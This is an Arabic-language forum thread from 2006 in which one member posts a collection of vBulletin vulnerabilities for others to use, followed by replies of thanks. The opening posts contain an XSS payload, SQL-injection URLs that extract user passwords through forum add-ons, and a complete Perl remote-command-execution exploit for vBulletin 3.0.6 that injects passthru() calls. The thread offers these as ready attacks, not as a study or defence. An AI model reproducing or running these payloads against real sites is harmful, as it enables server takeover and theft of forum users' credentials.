الي يسأل عن ثغرات vBulletin ان شاء الله اغلبها هناء

27 - 04 - 2006, 16:07 احمد بن سالم غير متواجد حاليآ بالمنتدى

احمد بن سالم

:: عضو نشيط ::

الي يسأل عن ثغرات vBulletin ان شاء الله اغلبها هناء

هذا الموضوع ان شاء الله يكون فيه اغلب ثغرات vBulletin
لاني اشوف اغلب الناس تسأل عن ثغراتها .
وبدل مايتعب الواحد ويبحث يلقاها هنا

1/ vBulletin 3.0.12-3.5.3 Cross_Site_Scripting

هذي جديده والى الان مافهمتلها ولا جربتها .

Software: vBulletin
Versions: 3.0.12-3.5.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimist

رمز Code:

:
/forum/profile.php?do=editpassword
pass:your pass
email: imei@myimei.com”>**********alert(1)</script>.nomatt
Note About lenght limitation 
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
forum/sendmessage.php?do=mailmember&u={your id}


-------Solution-------
Upgrade to vendore provided patch
المصدر : http://kapda.ir/advisory-266.html

- مشاركة هذا الرد في
- Digg
- Del.icio.us
- Technorati
- Twitter

توقيع احمد بن سالم

(أفْضِل على من شئت تكن أميره ، واستغن عمن شئت تكن نظيره ، واحتج إلى من شئت تكن اسيره)

(إذا كان الرأي عند من لا يقبل منه ، والسلاح عند من لا يستعمله والمال عند من لا ينفقه ضاعت الأمور)

رقم المشاركة : [ 2 ]

27 - 04 - 2006, 16:11 احمد بن سالم غير متواجد حاليآ بالمنتدى

احمد بن سالم :: عضو نشيط ::	ثغره في هاك الالعاب . رمز Code: index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user] مشاركة هذا الرد في Digg Del.icio.us Technorati Twitter
احمد بن سالم :: عضو نشيط ::	توقيع احمد بن سالم (أفْضِل على من شئت تكن أميره ، واستغن عمن شئت تكن نظيره ، واحتج إلى من شئت تكن اسيره) (إذا كان الرأي عند من لا يقبل منه ، والسلاح عند من لا يستعمله والمال عند من لا ينفقه ضاعت الأمور)

رقم المشاركة : [ 3 ]

27 - 04 - 2006, 16:20 احمد بن سالم غير متواجد حاليآ بالمنتدى

احمد بن سالم :: عضو نشيط ::	في التقويم . في VBulletin 3.5.2 رمز Code: http://www.xxxx.com/vb/calendar.php?do=addreminder&e=[eventid] مشاركة هذا الرد في Digg Del.icio.us Technorati Twitter
احمد بن سالم :: عضو نشيط ::	توقيع احمد بن سالم (أفْضِل على من شئت تكن أميره ، واستغن عمن شئت تكن نظيره ، واحتج إلى من شئت تكن اسيره) (إذا كان الرأي عند من لا يقبل منه ، والسلاح عند من لا يستعمله والمال عند من لا ينفقه ضاعت الأمور)

رقم المشاركة : [ 4 ]

27 - 04 - 2006, 16:22 احمد بن سالم غير متواجد حاليآ بالمنتدى

احمد بن سالم

:: عضو نشيط ::

وهذي ثغره ريموتي بس قديمه في VBulletin 3.0.6 وتحت

رمز Code:

:
#!/usr/bin/perl


# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)
# suBzero@kisobox.com
# Reference: http://www.securityfocus.com/bid/12622/info
#


use IO::Socket;


if (@ARGV < 3)
{
print q(
[+] vBulletin <= 3.0.6 Add templates 
[+] suBzero@kisobox.com
[+] Reference: http://www.securityfocus.com/bid/12622/info
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;
); 
exit;
}


$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];


$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";


$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); 
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}"; 


$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";


print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";


$on = 0; #flag


while ($res = <$sock>)
{
if ($res =~ /^_END_/) 
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/) 
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";
-------------------------

- مشاركة هذا الرد في
- Digg
- Del.icio.us
- Technorati
- Twitter

توقيع احمد بن سالم

رقم المشاركة : [ 5 ]

27 - 04 - 2006, 16:23 احمد بن سالم غير متواجد حاليآ بالمنتدى

احمد بن سالم :: عضو نشيط ::	ثغرة : في هاك اخر عشر مواضيع . رمز Code: http://www.xxxx.com/vb/last.php?fti...20LIMI T%201/* مشاركة هذا الرد في Digg Del.icio.us Technorati Twitter
احمد بن سالم :: عضو نشيط ::	توقيع احمد بن سالم (أفْضِل على من شئت تكن أميره ، واستغن عمن شئت تكن نظيره ، واحتج إلى من شئت تكن اسيره) (إذا كان الرأي عند من لا يقبل منه ، والسلاح عند من لا يستعمله والمال عند من لا ينفقه ضاعت الأمور)

رقم المشاركة : [ 6 ]

27 - 04 - 2006, 16:25 احمد بن سالم غير متواجد حاليآ بالمنتدى

احمد بن سالم :: عضو نشيط ::	ثغره في هاك من حمل هذا الملف رمز Code: http://www.xxxx.com/vb/whodownloade...R E%20userid=1 مشاركة هذا الرد في Digg Del.icio.us Technorati Twitter
احمد بن سالم :: عضو نشيط ::	توقيع احمد بن سالم (أفْضِل على من شئت تكن أميره ، واستغن عمن شئت تكن نظيره ، واحتج إلى من شئت تكن اسيره) (إذا كان الرأي عند من لا يقبل منه ، والسلاح عند من لا يستعمله والمال عند من لا ينفقه ضاعت الأمور)

رقم المشاركة : [ 7 ]

27 - 04 - 2006, 16:27 ! MaX ! غير متواجد حاليآ بالمنتدى

! MaX !

.:: عضو متألق ::.

بيانات موقعي

اسم الموقع: traidnt.net

اصدار المنتدى: لا أملك منتدى

اخوي شوف توقيعي فيه سلسلت دروس

! MaX !

أضفني كصديق

- مشاركة هذا الرد في
- Digg
- Del.icio.us
- Technorati
- Twitter

توقيع ! MaX !

سبحان الله وبحمده ,,, سبحان الله العظيم

! maks ! سابقا ,,

رقم المشاركة : [ 8 ]

27 - 04 - 2006, 16:52 ابن الخليـج غير متواجد حاليآ بالمنتدى

ابن الخليـج .:: عضو متألق ::.	الله يعطيك العافيه ابن الخليـج أضفني كصديق مشاركة هذا الرد في Digg Del.icio.us Technorati Twitter
ابن الخليـج .:: عضو متألق ::.	توقيع ابن الخليـج فوتوشوب Cinema 4D خامات فوتوشوب فرش فوتوشوب اكشن فوتوشوب اشكال فوتوشوب دليل مواقع ابن الخليج منتدى ابن الخليج طبخ ازياء ديكور

رقم المشاركة : [ 9 ]

27 - 04 - 2006, 16:55 الرياض هوست غير متواجد حاليآ بالمنتدى

الرياض هوست :: عضو نشيط ::	بالتوفيق انشاء الله الرياض هوست أضفني كصديق مشاركة هذا الرد في Digg Del.icio.us Technorati Twitter
الرياض هوست :: عضو نشيط ::	توقيع الرياض هوست ((((سـبـحـان الله وبـحـمـده سـبـحـان الله الـعـظـيـم)))) لاإله الا الله سبحان الله والحمدلله استغفر الله استغفر الله استغفرالله ومــاتــوفــيــقــي إلا بـــالـــلـــه

رقم المشاركة : [ 10 ]

27 - 04 - 2006, 17:01 الدينالي غير متواجد حاليآ بالمنتدى

الدينالي

Banned

بيانات موقعي

اسم الموقع: الردادي لتحميل الملفات والصور

اصدار المنتدى: لا أملك منتدى

الله يعطيك العافيه

الدينالي

أضفني كصديق

- مشاركة هذا الرد في
- Digg
- Del.icio.us
- Technorati
- Twitter

رقم المشاركة : [ 11 ]

27 - 04 - 2006, 17:24 مارد السعودية غير متواجد حاليآ بالمنتدى

مارد السعودية

:: عضو نشيط ::

بيانات موقعي

اسم الموقع: منتدى الدعم الفني التعليمي

اصدار المنتدى: منتج اخر

انت ليش مسوي لي بلوك
والرياض هوست بعد !!!
طيب ...

مارد السعودية

أضفني كصديق

- مشاركة هذا الرد في
- Digg
- Del.icio.us
- Technorati
- Twitter

توقيع مارد السعودية

سبحان الله وبحمده ... سبحان الله العظيم
===
هل ترغب في تعلم الدعم الفني مجانا والاستغناء عن شركات الدعم ؟
اذا كانت الاجابه بنعم تفضل بزيارة منتدى الدعم الفني التعليمي
اول منتدى عربي متخصص في تعليم الدعم الفني

رقم المشاركة : [ 12 ]

27 - 04 - 2006, 17:26 muss3b غير متواجد حاليآ بالمنتدى

muss3b

:: عضو نشيط ::

بيانات موقعي

اسم الموقع: muss3b . com

اصدار المنتدى: لا أملك منتدى

مشكور و ماتقصر ، و جزاك الله كل خير ، و جعل عملك في موازين حسناتك بإذن الله

تم التقييم .. وتستاهل أكثر

muss3b

أضفني كصديق

- مشاركة هذا الرد في
- Digg
- Del.icio.us
- Technorati
- Twitter

توقيع muss3b

الحمد لله الذي تواضع لعظمته كلُّ شيء، الحمد لله الذي استسلم لقدرته كلُّ شيء، الحمد لله الذي ذلَّ لعزَّته كلُّ شيء، الحمد لله الذي خضع لملكه كلُّ شيء

muss3b @ muss3b.com

@@@@

رقم المشاركة : [ 13 ]

27 - 04 - 2006, 17:27 SAMS3210 غير متواجد حاليآ بالمنتدى

SAMS3210 :: عضـــو::	بسم الله ما شاء الله عليك استاذ احمد SAMS3210 أضفني كصديق مشاركة هذا الرد في Digg Del.icio.us Technorati Twitter
SAMS3210 :: عضـــو::

رقم المشاركة : [ 14 ]

27 - 04 - 2006, 17:28 المرووق كوول غير متواجد حاليآ بالمنتدى

المرووق كوول :: عضو نشيط ::	شكراااا يا بوشهاب ويعطيك الف عافيه تحياتي لك . المرووق كوول أضفني كصديق مشاركة هذا الرد في Digg Del.icio.us Technorati Twitter
المرووق كوول :: عضو نشيط ::	توقيع المرووق كوول أسم الشركـــه : صاحب الشركه : أداء الشركـــه : بريد الشركـــه : هاتف الشركه : الدعم الفنــــي :.

رقم المشاركة : [ 15 ]

27 - 04 - 2006, 18:11 احمد بن سالم غير متواجد حاليآ بالمنتدى

احمد بن سالم :: عضو نشيط ::	حياكم الله فردا فردا وليست من عادتي مخاطبه عقولن غشيمة احمد بن سالم أضفني كصديق مشاركة هذا الرد في Digg Del.icio.us Technorati Twitter
احمد بن سالم :: عضو نشيط ::	توقيع احمد بن سالم (أفْضِل على من شئت تكن أميره ، واستغن عمن شئت تكن نظيره ، واحتج إلى من شئت تكن اسيره) (إذا كان الرأي عند من لا يقبل منه ، والسلاح عند من لا يستعمله والمال عند من لا ينفقه ضاعت الأمور)

أدوات الموضوع
عرض صفحة طباعة الموضوع ارسال الصفحة الى صديق
طرق العرض
العرض العادي الانتقال الى العرض المتطور الانتقال الى العرض الشجري

الي يسأل عن ثغرات vBulletin ان شاء الله اغلبها هناء

هذا الموضوع ان شاء الله يكون فيه اغلب ثغرات vBulletin لاني اشوف اغلب الناس تسأل عن ثغراتها . وبدل مايتعب الواحد ويبحث يلقاها هنا 1/